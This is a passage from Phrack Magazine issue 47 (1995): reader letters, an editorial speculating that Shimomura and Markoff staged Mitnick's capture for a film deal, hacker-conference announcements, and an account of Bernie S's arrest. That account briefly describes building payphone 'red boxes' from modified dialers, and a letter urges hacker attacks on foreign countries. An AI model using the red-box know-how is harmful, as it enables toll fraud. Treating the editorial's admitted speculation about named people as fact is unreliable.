Cyberians. As lueless and vulnerable to hype as I was, I couldn't help but stand back and listen to all the shit with a grin. In the same not, I ran into David Brin on AOL as well, and managed to get a correspondence goig with him. He was on discussing all the research he did on the "Net" and about the papers he was delivering, and, most importantly (of course), his upcoming BOOK about the Internet and privacy. At the time, still under the glossy spell of Wired (which I still find interesting) and the hype, I was eager to offer him an interview proposal, which I would have published in Wired if at all possible. Dr. Brin knew less than *I* did about the Internet. I can sum up most of these people's vocabularies in one word: "BLAH." They may as well reiterate that syllable ad infinitum--it amounts to the same thing. [WOW! Hey Cyber-guy, thanks for the super-cyber email. As we cruise along this InfoBanh, exiting in Cyberia, it takes a diligent cyberian like you to keep things in check! Sorry bout that. I was overcome with a minor brain malfunction that reduced my IQ to that of Douglas Rushkoff. Doesn't it all make you want to puke? I heard that yesterday on the soap opera "Loving" some character was hacking into food companies to steal recipes. A month or so back, on "All My Children" (The only soap I watch...but I'm embarrassed to say I watch it religiously), Charlie & Cecily were dorking around on the Internet, and sent each other email after reading notes they each left on alt.personals. The world is coming to an end.] ----------------------------------------------------------------------------- Yo erikb: yo dewd. eye am so paranoid, my t33th are rattling. what dewd eye dew? yew are the god of the internet. how dew eye stop the paranoia? please print answer in next phrack. thanx. m0fo [Your Acid will wear off in a few hours. Don't worry. Enjoy it. The CIA does. If it doesn't go away in a few days, there are some nice men in white lab coats who will be glad to help you out. How do you stop the paranoia? Your answer: Thorazine!] ----------------------------------------------------------------------------- This is Nemo Kowalski speaking (aka Paolo Bevilacqua). I just discovered Phrack at the young age of 31. ;-) Well, I like it a lot, at least like I enjoyed doing real things here in Europe, alone and with DTE222, years ago. I'm going to write something about the first anti-hacker operation in Italy, "Hacker Hunter," in which, incidentally, I got busted. Do you think your some of the old stories from altger and Itapac can be of interest to your readers? To Robert Clark: I read "My Bust" and I liked it. I'm not a native english speaker, but I think it was well-written, plus principally, I felt a pleasant "reader sharing writer's experiences" sensation that can separate a good reading from pure BS. This is expecially true since I've been busted here in Italy, and I've learned that things are more similar around the western world than I would have thought. The only thing I can't share is your Seattle experience. Maybe the dichotomy good druge/bad drugs has a different meaning for you? Respect, Nemo [Nemo: Please write as much or as little as you like about the busts in Italy! We have an article this issue about Italy, but any further insights into your experiences, esspecially regarding how busts are carried out in other countries would be greatly appreciated by our readers! I look forward to reading whatever you can put together!] ----------------------------------------------------------------------------- Chris, As a relative neophyte to hacking, one of the problems I come up with a lot is identifying systems I locate scanning. So, I was wondering if Phrack, or any other zine, had ever published a concise guide to clues to help identify unknown systems. If so, could you please let me know what mag, and what issue. One last thing, are there any internet sites with info of interest to hackers? I know about eff.org and freeside.com and a few others, but nothing really intriguing...any suggestions? [You will find a good start to identifying strange systems, and in locating sites of interest to hackers in the #Hack FAQ we've printed in this issue. ] ----------------------------------------------------------------------------- For Phrack news, Darkman was busted in Winnipeg City, Canada, for various reasons, but since I knew him personally I wanted to add my two cents. For the record, he was busted for warez and porn as well as hacking into the UoManitoba, and I heard his wife left him because he spent too much time pirating on IRC. He was about 38. He could read fluently in Russign, and I remember one night we discovered some secret KGB documents from the 50's, real science fiction thriller stuff, and he read it to me. Akalabeth [It's a drag that your friend was busted, and knowing the Canadian government, the porn part was probably pretty minor shit in a worldly sense. I'm kinda intrugued by the "KGB Documents" you found. Uh, were these on the net? Did you have a cyrillic character set loaded? How did you read these documents? Were they on paper? SEND THEM TO PHRACK! :) ] ----------------------------------------------------------------------------- Top 10 Reasons Why I Should Get My Subscription FREE: (1) I'm a programmer/Analyst for an electric utility company in Texas (ahh, come on - I'm a fellow Texan!) (2) I've read Phrack for years (loyalty scores points - right?) (3) I've been involved with compuers since GOD created the PC (I began in late 70's-early 80's). (4) I'm *not* a narc (shh, don't tell anybody.) (5) I *may* have a record (but if I do, it's for minor kind of stuff - I'm basically a nice guy). (6) I don't like the telephone company (you have to admit they're amusing though.) (7) I know how to get around on the 'net (can't you tell - I have an AOL account .) (8) I'm a good source of info regarding all types of mainframe and PC programming. (9) PLEASE.... (10) I'll quit writing dumb letters and trying to be funny. [David Letterman is in the background throwing up as I'm typing Don't quit your day job...but I'll send you Phrack anyway. :) ] ----------------------------------------------------------------------------- Hey Chris, I just read your thing in Phrack abou the US being attacked by our so called "allies" and I agree with you 110%! I do believe that we should start some sort of CyberArmy to fight back. I don't think that our government would mind, unless we crashed an economy that they were involved with or something, but hell, they fuck with us, let's fuck with them. And you were saying about phone costs, isn't it possible to just telnet or something over there? And why stop at fighting back against our information agressors, why not fight back against other countries that our government is too chickenshit to fight against? Cuba comes to mind. Well, I hope you reply or something, I really like Phrack, I try to get it whenever I can manage, but I don't have an internet address where I can get files. Keep up the good work. [Yet another volunteer for the US Cyber Corp! By God, I'll have an army yet. :) ] ----------------------------------------------------------------------------- ==Phrack Magazine== Volume Six, Issue Forty-Seven, File 2a of 23 ***************************************************************************** Phrack Editorial What you are about to read is pure speculation on my part. Do not take this to be 100% fact, since most of it is hypothesis. But it sure will make you think twice. "Ever get the feeling you're being cheated?" ----------------------------------------------------------------------------- So...Mitnick was busted. There certainly are some really odd things regarding the whole mess, especially with regards to the "investigating" being done by a certain heretofore unheralded "security" professional and a certain reporter. One of the first oddities was the way the Mitnick saga suddenly reappeared in the popular media. In February, and seemingly out of nowhere, the ever diligent John Markoff entered the scene with the a groundbreaking story. (Of course this is meant to be sarcastic as hell.) Markoff's story dealt with a near miss by federal authorities trying to apprehend Mr. Mitnick in Seattle about 5 months prior. Now, if nothing else happened in the whole Mitnick saga, I never would have given this a second thought, but in light of what followed, it really does seem odd. Why would someone write about a subject that is extremely dated of no current newsworthiness? "Our top story tonight: Generalissimo Francisco Franco is still dead." To be fair, I guess Markoff has had a hard on for Mitnick for ages. Word always was that Mitnick didn't really like the treatment he got in Markoff's book "Cyberpunk" and had been kinda screwing with him for several years. (Gee, self-proclaimed techie-journalist writes something untrue about computer hackers and gets harassed...who would have thought.) So it really isn't that odd that Markoff would be trying to stay abreast of Mitnick-related info, but it certainly is odd that he would wait months and months after the fact to write something up. But wait, a scant month and a half later, Mitnick gets busted! Not just busted, but tracked down and caught through the efforts of a computer security dude who had been hacked by Mitnick. Breaking the story was none other than our faithful cyber-newshawk, John Markoff. "Tsutomo Shimomura, born to an American mother and a Japanese father, thus becan life as he was destined to live it...going in several directions at once. A brilliant neurosurgeon, this restless young man grew quickly dissatisfied with a life devoted solely to medicine. He roamed the planet studying martial arts and particle physics, colelcting around him a most eccentric group of friends, those hard-rocking scientists The Hong Kong Cavaliers. "And now, with his astounding jet car ready for a bold assault on the dimension barrier, Tsutomo faces the greatest challenge of his turbulent life... "...while high above Earth, an alien spacecraft keeps a nervous watch on Team Shimomura's every move..." Wait a minute...that's Buckaroo Banzai. But the similarities are almost eerie. Security dude by day, hacker tracker by night, ski patrol rescue guy, links to the NSA! WOWOW! What an incredible guy! What an amazing story! But wait! Let's take a closer look at all of this bullshit, before it becomes so thick all we can see is tinted brown. Shimomura was supposedly hacked on Christmas Eve by Kevin Mitnick, which set him off on a tirade to track down the guy who hacked his system. Supposedly numerous IP tools were taken as well as "millions of dollars worth of cellular source code." First off, Shimomura's TAP is available via ftp. Modified versions of this have been floating around for a while. I suppose it's safe to assume that perhaps Tsutomo had modified it himself with further modifications (perhaps even some of the IP/localhost spoofs that the X-consortium guys were playing with, or maybe other tricks like denial of service and source-routing tricks...I don't really know, I don't have any such thing authored by Shimomura.) Secondly, what is all this cellular source code? And why did Shimomura have it? Could it be that this is really just some kind of smokescreen to make it seem like Mitnick did something bad? For those of you who don't know, Tsutomo is friends with Mark Lottor (yes, the OKI experimenter, and CTEK manufacturer.). They have been friends for some time, but I don't know how long. Lottor used to be roommates with, lo and behold, Kevin Poulsen! Yes, that Kevin Poulsen...the guy who before Mitnick was the "computer criminal de jour." Poulsen and Mitnick were no strangers. It wouldn't be too much of a stretch of the imagination to think that those files were really ROM dumps from phones that Lottor had given Shimomura. It also wouldn't be too much of a stretch to imagine that Mitnick knew Tsutomo, and decided to go poke around, pissing off Tsutomo who knew that he'd been violated by SOMEONE HE ACTUALLY KNEW! (It sure does piss me off much more to get fucked over by someone I know rather than a complete stranger.) Woah. If any of that is true, what strange bedfellows we have. But wait, it gets better... Enter John Markoff. Markoff and Tsutomo have obviously known each other for a while. I don't know where they met...but I know they were together at Defcon, maybe at Hope, and probably at the Tahoe Hacker's conference a few years back. (I'd have to go back and look over the group photos to be certain.) Markoff already has a stake in the Mitnick story, since it was his book, "Cyberpunk" that really gave ol' Kevin some coverage. Now, if Markoff knew that Mitnick had hacked Tsutomo (from Tsutomo's own mouth), then certainly any journalist worth his salt would see possibilities. Gee, what a great concept! A colorful computer security guy tracks down one of the world's most wanted hackers! What a great story! Remember that Stoll Guy? But in order to get the book publishers really hot, it would take some more press to rejuvinate interest in the Mitnick story. So the first story, months after the fact, is printed. Meanwhile, Tsutomo is supposedly tracking down Mitnick. How does one track down a hacker? The legal (and really annoyingly hard way) is to work with other system administrators and establish a trail via tcp connects and eventually back to a dialup, then work with phone companies to establish a trap and trace (which usually takes two or three calls) and then working with local police to get a warrant. Somehow Tsutomo seemingly managed to avoid all this hassle and get a lot done by himself. How? Well, the Air Force OSI managed to track down the British Datastream Cowboy by hacking into the systems he was hacking into the Air Force from. This is the easy way. Hmmm. I know with a good degree of certainty that Markoff's and Tsutomo's little escapades pissed off a great many people within law enforcement, but I don't know exactly why. If they WERE bumbling around stepping on FBI toes during the course of their litle hunt, certainly the FBI would have threatened them with some kind of obstruction of justice sentence if they didn't stop. Did they? Well before any of this had begun, Mitnick had been hacking other places too. Guess what? He happened to hack CSCNS, where a certain ex-hacker, Scott Chasin, runs the security side of things. I remember well over a year ago talking to Chasin about a hacker who had breeched CNS. Discussing his methods, we thought it must be Grok, back from the netherworld, since he was so skilled. The hacker also made claims of being wireless to avoid being traced. (This also fit into the Grok modus operandi...so we just assumed it was indeed Grok and left it at that.) Chasin told the hacker to get off of CNS, and that he could have an account on crimelab.com, if he would only use it for mail/irc/whatever, but with no hacking, and on the agreement that he would leave CSCNS alone. The agreement was made, but went sour after only a few weeks when the mystery hacker began going after CSCNS again. The Colorado Springs FBI was called in to open an investigation. This was ages ago, but of course, field agencies rarely talk. Back in the present, Tsutomo goes to help out at the Well, where a certain admin (pei) was having problems with intruders. This is the same pei who a few months earlier told Winn Schwartau "The Well has no security!" Which Winn reported in his newsletter. (This of course came after Winn's account on the Well was reactvated by an anonymous person who posted several messages about Markoff and signed them "km." DUH!) So somehow, Tsutomo gets trace information leading back to a cell site in North Carolina. How does a private citizen get this kind of information? Don't ask me! My guess is that the feds said, give us what you know, help us out a bit and don't get in our way. In return, one can surmise that Tsutomo (and Markoff) got to glean more info about the investigation by talking with the feds. So, Mitnick gets busted, and Tsutomo got to ride around in a car with a Signal Strength Meter and help triangulate Mitnick's cellular activity to his apartment. Woo woo! After all is said and done, Tsutomo has single handedly captured Mitnick, John Markoff breaks the story on the FRONT PAGE of the New York Times, and every other computer reporter in America continually quotes and paraphrases Markoff's story and research as "God's Own Truth." Mitnick, on the other hand, gets blamed for: 1) hacking Tsutomo 2) hacking the Well 3) hacking Netcom to get credit cards 4) hacking CSCNS 5) hacking Janet Reno's Cell Phone 6) hacking motorola 7) conversing with foreign nationals etc.. Let's look at some these charges: 1) Mitnick was not the first (or only) to hack Tsutomo. The San Deigo Supercomputer Center is a target for a lot of people. It's a major Internet center, and there are all kinds of goodies there, and the people who work there are smart guys with nice toys. Sorry, but Mitnick is the scapegoat here. 2) Mitnick was not the first, last, or most recent to hack The Well. Like Pei said, "The Well Has No Security." I know this first hand, since I have an account there. I don't raise a stink about it, because I pay by check, and my email is boring. 3) Mitnick was not the person who got the Netcom credit card file. That file floated around for quite some time. He might have had a copy of it, but so do countless others. Sorry. Wrong again. 4) Mitnick was in CNS. He was not the only one. Thanks for playing. 5) The thought that Mitnick could reprogram a MTSO to reboot upon recognizing a ESN/MIN pair belonging to one specific individual would require that he had hacked the manufacturer of the MTSO, and gotten source code, then hacked the cellular carrier and gotten a full database of ESN/MIN information. Both of these things have been done by others, and Mitnick certainly could have done them too, but I doubt he would have gone to that much trouble to call attention to his actions. 6) Motorola, like EVERY other big-time computer industry giant has been hacked by countless people. 7) Mitnick reportedly had dealings with foreign nationals, especially one "Israeli" that set the CIA up in arms. Well, sure, if you get on IRC and hang out, you are probably going to talk to people from other countries. If you hang out on #hack and know your stuff, you will probably end up trading info with someone. But, playing devil's advocate, perhaps the person you might be talking to really isn't a 22 year old Israeli student. Maybe he really is a 40 year old Mossad Katsa working in their computer center. Was Mitnick Jewish? Would he do "whatever it takes to help the plight of Jews worldwide?" Could he have been approached to become one of the scores of sayanim worldwide? Sure. But probably not. He'd be too hard to call on for the favors when they would be needed by Mossad agents. So, I have some doubts about this. Less than a month after the whole bust went down, Markoff and Tsutomo signed with Miramax Films to produce a film and multimedia project based on their hunt for Mitnick. The deal reportedly went for $750,000. That is a fuckload of money. Markoff also gets to do a book, which in turn will become the screenplay for the movie. (Tsutomo commented that he went with Miramax "based on their track record." Whatever the fuck that means.) Less than a month and they are signed. Looks to me like our duo planned for all this. "Hey Tsutomo, you know, if you went after this joker, I could write a book about your exploits! We stand to make a pretty penny. It would be bigger than the Cuckoo's egg!" "You know John, that's a damn good idea. Let me see what I can find. Call your agent now, and let's get the ball rolling." "I'll call him right now, but first let me write this little story to recapture the interest of the public in the whole Mitnick saga. Once that runs, they publishers are sure to bite." Meanwhile Mitnick becomes the fall guy for the world's ills, and two guys methodically formulate a plot to get rich. It worked! Way to go, guys. ==Phrack Magazine== Volume Six, Issue Forty-Seven, File 3 of 22 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART I ------------------------------------------------------------------------------ -----BEGIN PGP SIGNED MESSAGE----- Phrack Magazine and Computer Security Technologies proudly present: The 1995 Summer Security Conference SSSS U U M M M M EEEEE RRRR CCCC OOOO N N S U U MM MM MM MM E R R C O O NN N SSS U U M M M M M M M M EEE RRRR C O O N N N S U U M M M M M M E R R C O O N NN SSSS UUUU M M M M EEEEE R R CCCC OOOO N N "SUMMERCON" June 2-4 1995 @ the Downtown Clarion Hotel in Atlanta, Georgia This is the official announcement and open invitation to the 1995 incarnation of Summercon. In the past, Summercon was an invite-only hacker gathering held annually in St. Louis, Missouri. Starting with this incarnation, Summercon is open to any and all interested parties: Hackers, Phreaks, Pirates, Virus Writers, System Administrators, Law Enforcement Officials, Neo-Hippies, Secret Agents, Teachers, Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers, Programmers, Conspiracy Nuts, Musicians and Nudists. LOCATION: The Clarion Hotel is located in downtown Atlanta, 9 miles from Hartsfield International Airport and just a few blocks from the Peachtree Center MARTA Station. Considering the exorbitant expenses involved with attending other conferences of this type, Rooms at Summercon are reduced to $65 per night for Single or Double Occupancy The Clarion Hotel Downtown, Courtland at 70 Houston St., NE, Atlanta, GA 30303 (404) 659-2660 or (800) 241-3828 (404) 524-5390 (fax) No one likes to pay a hundred dollars a night. We don't expect you to have to. Spend your money on room service, drinks in the hotel bar, or on k-rad hacker t-shirts. Remember: Mention that you are attending Summercon in order to receive the discount. DIRECTIONS 75/85 Southbound - Exit 97 (Courtland). Go 3 blocks south on Courtland then turn left on Houston (John Wesley Dobbs Ave.) 20 East - Exit 75/85 North at International. Turn Left on Courtland at Houston Ave. NE. (aka. John Wesley Dobbs Ave. NE.) 20 West - Exit 75/85 North at International. One block to Courtland and right at Houston Ave. NE. (John Wesley Dobbs Ave. NE.) Atlanta Airport Shuttle - The Express Bus that leaves from Atlanta's International Airport will drop you off at many hotels in the downtown area, including the Clarion. The shuttle should be no more than 12 dollars. Fares may be paid at the Airport Shuttle in the Ground Transportation area of the Airport Terminal. MARTA - The Metropolitan Atlanta Rapid Transit Authority (MARTA), is a convenient and inexpensive way to negotiate most of the Atlanta area. Take the MARTA train from the Airport to the Peach Tree Center Station. Walk three blocks down Houston to the intersection of Houston and Courtland. The MARTA fare will be roughly 2 dollars. Taxis - The average cab fare from Atlanta's Airport to the downtown area is roughly 30 dollars. CONFERENCE INFO It has always been our contention that cons are for socializing. "Seekret Hacker InPh0" is never really discussed except in private circles, so the only way anyone is going to get any is to meet new people and take the initiative to start interesting conversations. Because of this, the formal speaking portion of Summercon will be held on one day, not two or three, leaving plenty of time for people to explore the city, compare hacking techniques, or go trashing and clubbing with their heretofore unseen online companions. The "Conference" will be held on June 3rd from roughly 11:00 am until 6:00 pm with a 1 hour lunch break from 1:00 to 2:00. NO VIDEO TAPING WILL BE ALLOWED IN THE CONFERENCE ROOM. Audio Taping and still photography will be permitted. CURRENT LIST OF SPEAKERS: Robert Steele - Ex-Intelligence Agent, Founder and CEO of Open Source Solutions (a private sector intelligence firm) Topic: Hackers from the Intelligence Perspective Winn Schwartau - Author of "Information Warfare" and "Terminal Compromise", Publisher of Security Insider Report, and noted security expert Topic: Electromagnetic Weaponry Bob Stratton - Information Security Expert from one of America's largest Internet service providers Topic: The Future of TCP/IP Security Eric Hughes - Cryptography Expert and founding member of the "Cypherpunks" Topic: Cryptography, Banking, and Commerce Annaliza Savage - London-based Director/Producer Topic: Discussion of her documentary "Unauthorized Access" (Followed by a public screening of the film) Chris Goggans - Editor of Phrack Magazine and Summercon M.C. Topic: introductions, incidentals and a topic which is sure to culminate in an international incident. (Other Speakers May Be Added - Interested parties may contact scon@fc.net) COSTS Since other cons of this type have been charging from 25 to 40 dollars entry fees, we are only charging 10 dollars. Yes, that's correct, TEN (10) dollars in US currency. Money is far too scarce among the hacker community to fleece everyone for money they will probably need to eat with or pay for their hotel rooms. WHAT TO DO IN ATLANTA: To attempt to make everyone's stay in Atlanta more exciting, we are contacting local establishments to arrange for special discounts and/or price reductions for Summercon attendees. Information will be handed out regarding these arrangements at the conference. Atlanta is a happening town. Touristy Stuff Party Time The World of Coca-Cola Buckhead Underground Atlanta The Gold Club Georgia Dome (Baseball?) (Countless Other Clubs and Bars) Six Flags CONTACTING SUMMERCON SPONSORS You can contact the Summercon sponsors by several means: E-mail: scon@fc.net WWW: http://www.fc.net/scon.html Snail Mail: Phrack Magazine 603 W. 13th #1A-278 Austin, TX 78701 If deemed severely urgent, you can PGP your email with the following PGP key: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR tBRwaHJhY2tAd2VsbC5zZi5jYS51cw== =evjv - -----END PGP PUBLIC KEY BLOCK----- See you in Atlanta! -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBL4mMEaR4oxgb1CldAQE5dQP+ItUraBw4D/3p6UxjY/V8CO807qXXH6U4 46ITHnRJXWfEDRAp1jwl+lyavoo+d5AJPSVeeFt10yzVDEOb258oEZkIkciBnr7q mUu563/Qq67gBsOWYP7sLdu3KEgedcggkzxtUzPxoVRVZYkHWKKjkG1t7LiT3gQ5 uRix2FrftCY= =m/Yt -----END PGP SIGNATURE----- ------------------------------------------------------------------------------ UNAUTHORIZED ACCESS "Unauthorized Access [is] a documentary that tells the story of the computer underground from our side, it captures the hacker world from Hamburg to Los Angeles and virtually everywhere in between." 2600 The Hacker Quarterly Computers are becoming an integral part of our everyday existence. They are used to store and send a multitude of information, from credit reports and bank withdrawals, to personal letters and highly sensitive military documents. So how secure are our computer systems? The computer hacker is an expert at infiltrating secured systems, such as those at AT&T, TRW, NASA or the DMV. Most computer systems that have a telephone connection have been under siege at one time or another, many without their owner's knowledge. The really good hackers can reroute the telephone systems, obtain highly sensitive corporate and government documents, download individual's credit reports, make free phone calls globally, read private electronic mail and corporate bulletins and get away without ever leaving a trace. So who are these hackers? Just exactly WHAT do they do and WHY do they do it? Are they really a threat? What do they DO with the information that they obtain? What are the consequences of their actions? Are hackers simply playing an intellectual game of chess or are hackers using technology to fight back and take control of a bureaucratic system that has previously appeared indestructible? Unauthorized Access is a documentary that demistifies the hype and propaganda surrounding the computer hacker. Shot in 15 cities and 4 countries, the film hopes to expose the truths of this subculture focusing on the hackers themselves. Unauthorized Access is a view from inside the global underground. For a PAL (European) copy send a cheque/postal order for 15 British Pounds or $25 for NTSC (American) standard to: Savage Productions Suite One 281 City Road London EC1V 1LA ------------------------------------------------------------------------------ ACCESS ALL AREAS Hacking Conference 1st - 2nd July, 1995 (Saturday & Sunday) King's College, London, UK -------------------------------WHAT-IT-IS--------------------------------- The first UK hacking conference, Access All Areas, is to be run in London later this year. It is aimed at hackers, phone phreaks, computer security professionals, cyberpunks, law enforcement officials, net surfers, programmers, and the computer underground. It will be a chance for all sides of the computer world to get together, discuss major issues, learn new tricks, educate others and meet "The Enemy". -------------------------------WHERE-IT-IS-------------------------------- Access All Areas is to be held during the first weekend of July, 1995 at King's College, London. King's College is located in central London on The Strand and is one of the premier universities in England. -----------------------------WHAT-WILL-HAPPEN----------------------------- There will be a large lecture theatre that will be used for talks by computer security professionals, legal experts and hackers alike. The topics under discussion will include hacking, phreaking, big brother and the secret services, biometrics, cellular telephones, pagers, magstrips, smart card technology, social engineering, Unix security risks, viruses, legal aspects and much, much more. Technical workshops will be running throughout the conference on several topics listed above. A video room, equipped with multiple large screen televisions, will be showing various films, documentaries and other hacker related footage. The conference facilities will also include a 10Mbps Internet link connected to a local area network with various computers hanging off of it and with extra ports to connect your laptop to. ------------------------------REGISTRATION-------------------------------- Registration will take place on the morning of Saturday 1st July from 9:00am until 12:00 noon, when the conference will commence. Lectures and workshops will run until late Saturday night and will continue on Sunday 2nd July from 9:00am until 6:00pm. ----------------------------------COST------------------------------------ The price of admission will be 25.00 British pounds (approximately US $40.00) at the door and will include a door pass and conference programme. -----------------------------ACCOMMODATION-------------------------------- Accommodation in university halls of residence is being offered for the duration of the conference. All prices quoted are per person, per night and include full English breakfast. (In British pounds) SINGLE TWIN WELLINGTON HALL 22.00 16.75 Special prices for British and Overseas university students, holding current student identification, are also available - please call King's Campus Vacation Bureau for details. All bookings must be made directly with the university. They accept payment by cash, cheque and credit card. To making a booking call the following numbers... KING'S CAMPUS VACATION BUREAU Telephone : +44 (0)171 351 6011 Fax : +44 (0)171 352 7376 ----------------------------MORE-INFORMATION------------------------------ If you would like more information about Access All Areas, including pre-registration details then please contact one of the following... Telephone : +44 (0)973 500202 Fax : +44 (0)181 224 0547 Email : info@phate.demon.co.uk ------------------------------------------------------------------------------ D I S T R I B U T E W I D E L Y *****FIRST CALL FOR PAPERS***** InfoWarCon '95 A 2 Day International Symposium on Information Warfare September 7-8, 1995 Stouffer Concourse Hotel Arlington, VA Presented by: National Computer Security Association Winn Schwartau and Interpact, Inc. Robert Steele and OSS, Inc. CONFERENCE OVERVIEW: The Information Warfare Conference (InfoWarCon) is our third international conference dedicated to the exchange of ideas, policies, tactics, weapons, methodologies and defensive posture of Information Warfare on a local, national, and global basis. InfoWarCon will bring together international experts from a broad range of disciplines to discuss and integrate concepts in this rapidly evolving field. Attendees will intensely interact with the speakers and presenters as well as each other to increase each other's understanding of the interrelatedness of the topics. While there are many interpretations of Information Warfare by different groups, the current working definition we employ is: Information Warfare is the use of information and informa tion systems as weapons in a conflict where information and information systems are the targets. Information Warfare is broken down into three categories, and InfoWarCon speakers and attendees will interactively examine them all: Class I: Personal Privacy. "In Cyberspace You Are Guilty Until Proven Innocent." The mass psychology of information. Privacy versus stability and law enforcement. Class II: Industrial and Economic Espionage. Domestic and international ramifications and postures in a globally networked, competitive society. Class III: Global Information Warfare. Nation-state versus Nation-state as an alternative to convention warfare, the military perspective and terrorism. THE CONFERENCE The conference is designed to be interactive - with extensive interaction between all participants. The preliminary contents and discussions will focus on: - What is Information Warfare? - What Are the Targets? - Protecting the Global Financial Infrastructure - Military Perspectives on InfoWar - InfoWar Vs. Non-Lethal Warfare - Defending the U.S. Infrastructure - The Intelligence Community and Information - Open Source Intelligence - The Psychology of Information - Privacy Balances - Information As the Competitive Edge - International Cooperation - Denial of Service - Cyber-Terrorism - Offensive Terrorism - Offensive InfoWar Techniques - Defensive InfoWar Postures - Education and Awareness Training - Corporate Policy - Government Policy - Global Policy - Espionage - Export Controls of Information Flow - The Legal Perspective - The New Information Warriors Plenary sessions will accommodate all attendees, while break-out sessions will provide more intimate presentations and interactiv ity on topics of specific interests. SUBMISSIONS: Submission for papers are now be accepted. We are looking for excellent speakers and presenters with new and novel concepts of Information Warfare. You may submit papers on the topics listed above, or on others of interest to you, your company or govern ment. We welcome innovative thought from the private sector, the gov ernment (civilian, military and intelligence) and the interna tional community. Submissions must be received by May 1, 1995, and notification of acceptance will occur by June 1, 1995. Please submit 2-3 page presentation outlines to: winn@infowar.com. All submissions and the contents of InfoWarCon '95 will be in English. If you must submit a hard copy: Fax: 813.393.6361 or snail mail to: Interpact, Inc. 11511 Pine St., Seminole, FL 34642 All submissions and presentation should be unclassified, as they will become Open Source upon submission and/or acceptance. SPONSORS: The Information Warfare Symposium is currently choosing sponsors for various functions. Continental Breakfast, Day 1 and Day 2 Morning Coffee Break, Day 1 and Day 2 Lunch, Day 1 and Day 2 Afternoon Coffee Break, Day 1 and Day 2 Cocktail Party, Day 1 Each Corporate or Organizational sponsor will be included in all promotional materials and Symposium function. For more infor- mation, contact Paul Gates at the NCSA. Voice: 717.258.1816 or email: 747774.1326@Compuserve.com. EXHIBITS: Limited space is available for table-top displays for commercial or governmental products, services, educational or other promo tion. For further information, contact Paul Gates at the National Computer Security Association. 717.258.1816 REGISTRATION: Payment made BEFORE July 1, 1995: ( ) $445.00 NCSA Member/OSS Attendee ( ) $545.00 All others Payment made AFTER July 1, 1995: ( ) $495.00 NCSA Members/OSS Attendees ( ) $595.00 All others ( ) I'M INTERESTED, but would like more information sent to the address above. Please include a free copy of your 32 page "Information Security Resource Catalog". ( ) I'd like to know more about NCSA on-site training, security audits and consulting services. Please have someone give me a call. MAIL OR FAX TO: National Computer Security Association 10 South Courthouse Avenue Carlisle, PA 17013 Phone 717-258-1816 or FAX 717-243-8642 EMAIL: 74774.1326@compuserve.com CompuServe: GO NCSAFORUM Winn Schwartau Interpact, Inc. Information Security & Warfare V:813.393.6600 F:813.393.6361 Email: Winn@Infowar.Com ------------------------------------------------------------------------------ Ed Cummings, also known to many in cyberspace as "Bernie S" was arrested on March 13th, 1995 for 2 misdemeanors of possession, manufacture and sale of a device to commit Telecommunications fraud charges. He is being held in Delaware County Prison in lieu of $100,000.00 Bail. His story follows. On the evening of the 13th Bernie S. received a page from his mail drop. Some people he knew from Florida had stopped in at his mail drop thinking it was his address. They were looking to purchase several 6.5 Mhz Crystals. These crystals when used to replace the standard crystal in the RADIO SHACK Hand Telephone dialer, and with some programming, produce tones that trick pay phones into believing they have received coins. These are commonly referred to as "red boxes" and got their name from an actual red box pulled from a pay phone in the late seventies by some curious person. Ed Cummings met these people at a local 7-11 (which 7-11?) where he was to sell the widely used electronic timing crystals for roughly $4 a piece. The purchaser only had two twenty dollar bills and Ed Cummings no change. Ed Cummings went into the 7-11 to get some change to make the transaction. A police officer noticed a van parked in the parking lot of the 7-11 with more several African Americans inside. As Ed was leaving the 7-11 he noticed fifteen police cars pulling into the parking lot of the 7-11. Next thing he knew the police were asking him if they could `rifle` through his car. He said no. Moments later as he was talking to a Detective and noticed another police officer going through his car. He asked the officer to stop. They did not, in all the police confiscated a few hundred 6.5Mhz crystals (which he resells for roughly $4 a piece) and a large box of 100 dialers. The police told him they would get back to him, and he could have his electronics back if the contents of the bag were legal. In the contents of the seized items was one modified dialer, that a customer returned after modification explaining that it did not work, a broken red box. The next day Ed `Bernie S.` Cummings was over at a friend`s house working on their computer when eight to ten plain clothed armed men burst into the house and ordered him and his friends to freeze. They cuffed him and took him to a holding cell (what jail?). There he was left without a blanket or jacket to sleep with in the cold cell. That evening the Secret Service had been called in when someone figured out what the dialers and crystals would do when put together. The United States Secret Service found his home and entered it, while they were questioning him. The next morning at his arraignment he was finally told of the charges he was being held upon. They were Two misdemeanor Charges of manufacture, Distribution and Sale of devices of Telecommunications Fraud. and Two Unlawful use of a computer charges. His bail was automatically set to $100,000.00 because Ed Cummings refused talk with the police without his attorney present. The Secret Service presented to the judge a 9 page inventory of what they had found in his home. On that inventory there 14 computers. 2 printers. more Boxes of bios chips for the systems he worked with. Eprom burners which the Federal Agents had labeled "Cellular telephone chip reprogramming adapters" Eproms are used in everything from Automobile computers to personal computers. They also confiscated his toolbox of screw drivers, wire clippers and other computer oriented tools he used for his consulting job. The Judge dropped the Two unlawful use of a computer charges due to the fact that the evidence was circumstantial and the county had no actual evidence that Ed had ever used the computers in question. As of 3/27/1995 Ed Cummings is still in Delaware County Prison awaiting his trial. His trial has not yet been scheduled and Ed will most likely not raise the One Hundred Thousand Dollars needed to be released on bail. ------------------------------------------------------------------------------ "Don't believe the hype." - Public Enemy, 1988 This file's purpose is to clear up any misconceptions about the recent situation that has come upon the sociopolitical group known as KoV. As it stands now, (10:55 PM EST on 1/29/95), NO ONE has been busted for ANYTHING. We have received several tip-offs from private sources regarding a supposed "FBI investigation" of our group that is purported to be active at this very minute. However, with the exception of a few VERY suspicious incidents and coincidences, there has been NO HARD EVIDENCE thus far about ANYONE getting busted for ANYTHING. So while we are EXTREMELY concerned for the integrity of our innocence, we must stress that nothing has gone down. Yet. We have very good reason to believe that a few of those among us are about to be charged with various false accusations by a local university. However the current mental state of the person in charge of this charade is also in question. Therefore it would be logical to assume nothing. The conflicting tip-offs, rumors, warnings and threats that we have received make it even more 